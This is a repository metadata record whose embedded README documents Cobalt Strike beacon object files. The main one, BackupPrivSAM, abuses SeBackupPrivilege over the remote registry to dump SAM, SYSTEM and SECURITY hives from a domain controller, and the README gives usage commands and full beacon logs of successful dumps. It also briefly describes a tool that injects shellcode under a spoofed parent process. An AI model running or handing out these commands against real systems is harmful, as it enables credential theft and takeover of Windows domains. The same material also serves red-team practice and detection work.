{"id":13839582,"url":"https://github.com/m57/cobaltstrike_bofs","last_synced_at":"2025-07-11T06:30:41.978Z","repository":{"id":49338792,"uuid":"283890182","full_name":"m57/cobaltstrike_bofs","owner":"m57","description":"My CobaltStrike BOFS","archived":false,"fork":false,"pushed_at":"2022-07-23T20:37:52.000Z","size":712,"stargazers_count":156,"open_issues_count":1,"forks_count":24,"subscribers_count":5,"default_branch":"master","last_synced_at":"2024-08-05T17:23:56.783Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/m57.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2020-07-30T22:36:51.000Z","updated_at":"2024-07-03T22:57:34.000Z","dependencies_parsed_at":"2022-08-12T20:01:39.420Z","dependency_job_id":null,"html_url":"https://github.com/m57/cobaltstrike_bofs","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m57%2Fcobaltstrike_bofs","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m57%2Fcobaltstrike_bofs/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m57%2Fcobaltstrike_bofs/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/m57%2Fcobaltstrike_bofs/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/m57","download_url":"https://codeload.github.com/m57/cobaltstrike_bofs/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225699938,"owners_count":17510431,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-04T17:00:30.704Z","updated_at":"2024-11-21T08:31:17.593Z","avatar_url":"https://github.com/m57.png","language":"C","funding_links":[],"categories":["C","C (286)"],"sub_categories":[],"readme":"# BackupPrivSam\n\nA basic implementation of abusing the `SeBackupPrivilege` via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.\n\nInspired by https://twitter.com/filip_dragovic initial PoC. Just made it into a BOF.\n\nCould be improved to auto download the hives. CBA\n\n## Usage\n\n```\nBackupPrivSAM [\\\\computername] [save path] (optional: [domain] [username] [password])\n```\n\n1. Dump the Hives to remote C:\\ drive, using the current Primary Token\n\n    `BackupPrivSAM \\\\dc01.contoso.local C:\\`\n\n2. Dump the Hives to remote C:\\ drive, and impersonate a user\n\n    `BackupPrivSAM \\\\dc01.contoso.local C:\\ CONTOSO backup_service Password123`\n\n\n## With Impersonation (SeBackupPrivilege enabled account)\n\n```\nbeacon\u003e backupPrivSAM \\\\cdc001.corp.contoso.local C:\\ CORP backup_service *************\n[*] Launching backupPrivSAM...\n[+] host called home, sent: 2589 bytes\n[+] received output:\nGot Credentials. Making Token...\n[+] received output:\nImpersonated user: CORP\\backup_service\n[+] received output:\nWill try to dump SAM from \\\\cdc001.corp.contoso.local\\HKLM\\ into folder 'C:\\'\n[+] received output:\nConnecting to remote registry of '\\\\cdc001.corp.contoso.local'\n[+] received output:\nRegConnectRegistryW() - OK\n[+] received output:\nDumping \\\\cdc001.corp.contoso.local\\HKLM\\SAM hive to C:\\SAM\n[+] received output:\nDumping \\\\cdc001.corp.contoso.local\\HKLM\\SYSTEM hive to C:\\SYSTEM\n[+] received output:\nDumping \\\\cdc001.corp.contoso.local\\HKLM\\SECURITY hive to C:\\SECURITY\n\nbeacon\u003e ls \\\\cdc001\\C$\n[*] Tasked beacon to list files in \\\\cdc001\\C$\n[+] host called home, sent: 29 bytes\n[*] Listing: \\\\cdc001\\C$\\\n\n Size     Type    Last Modified         Name\n ----     ----    -------------         ----\n          dir     04/29/2019 01:27:26   $Recycle.Bin\n          dir     04/27/2019 16:32:36   Documents and Settings\n          dir     05/05/2019 17:53:11   PerfLogs\n          dir     11/20/2019 11:30:27   Program Files\n          dir     04/28/2019 17:45:56   Program Files (x86)\n          dir     08/17/2021 21:09:38   ProgramData\n          dir     04/27/2019 16:32:36   Recovery\n          dir     04/28/2019 17:46:10   System Volume Information\n          dir     04/29/2019 01:26:56   Users\n          dir     10/02/2021 19:27:55   Windows\n 380kb    fil     11/21/2016 00:42:45   bootmgr\n 1b       fil     07/16/2016 14:18:08   BOOTNXT\n 1gb      fil     07/19/2022 17:45:55   pagefile.sys\n 52kb     fil     07/23/2022 21:23:45   SAM\n 32kb     fil     07/23/2022 21:23:45   SECURITY\n 17mb     fil     07/23/2022 21:23:45   SYSTEM\n```\n\n## Without impersonation\n\n```\nbeacon\u003e make_token CORP\\backup_service **********\n[*] Tasked beacon to create a token for CORP\\backup_service\n[+] host called home, sent: 59 bytes\n[+] Impersonated CORP\\Administrator\n\nbeacon\u003e backupPrivSAM \\\\cdc001.corp.contoso.local C:\\\n[*] Launching backupPrivSAM...\n[+] host called home, sent: 2511 bytes\n[+] received output:\nWill try to dump SAM from \\\\cdc001.corp.contoso.local\\HKLM\\ into folder 'C:\\'\n[+] received output:\nConnecting to remote registry of '\\\\cdc001.corp.contoso.local'\n[+] received output:\nRegConnectRegistryW() - OK\n[+] received output:\nDumping \\\\cdc001.corp.contoso.local\\HKLM\\SAM hive to C:\\SAM\n[+] received output:\nDumping \\\\cdc001.corp.contoso.local\\HKLM\\SYSTEM hive to C:\\SYSTEM\n[+] received output:\nDumping \\\\cdc001.corp.contoso.local\\HKLM\\SECURITY hive to C:\\SECURITY\n\nbeacon\u003e ls \\\\cdc001\\C$\n[*] Tasked beacon to list files in \\\\cdc001\\C$\n[+] host called home, sent: 29 bytes\n[*] Listing: \\\\cdc001\\C$\\\n\n Size     Type    Last Modified         Name\n ----     ----    -------------         ----\n          dir     04/29/2019 01:27:26   $Recycle.Bin\n          dir     04/27/2019 16:32:36   Documents and Settings\n          dir     05/05/2019 17:53:11   PerfLogs\n          dir     11/20/2019 11:30:27   Program Files\n          dir     04/28/2019 17:45:56   Program Files (x86)\n          dir     08/17/2021 21:09:38   ProgramData\n          dir     04/27/2019 16:32:36   Recovery\n          dir     04/28/2019 17:46:10   System Volume Information\n          dir     04/29/2019 01:26:56   Users\n          dir     10/02/2021 19:27:55   Windows\n 380kb    fil     11/21/2016 00:42:45   bootmgr\n 1b       fil     07/16/2016 14:18:08   BOOTNXT\n 1gb      fil     07/19/2022 17:45:55   pagefile.sys\n 52kb     fil     07/23/2022 21:24:06   SAM\n 32kb     fil     07/23/2022 21:24:07   SECURITY\n 17mb     fil     07/23/2022 21:24:07   SYSTEM\n```\n\n# QueueUserAPC_PPID\n\n\u003e queueuserapc_ppid/\n\nBOF spawns a process of your choice under a specified parent, and injects a provided shellcode file via QueueUserAPC().\n\n![](queueuserapc_ppid.gif)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fm57%2Fcobaltstrike_bofs","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fm57%2Fcobaltstrike_bofs","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fm57%2Fcobaltstrike_bofs/lists"}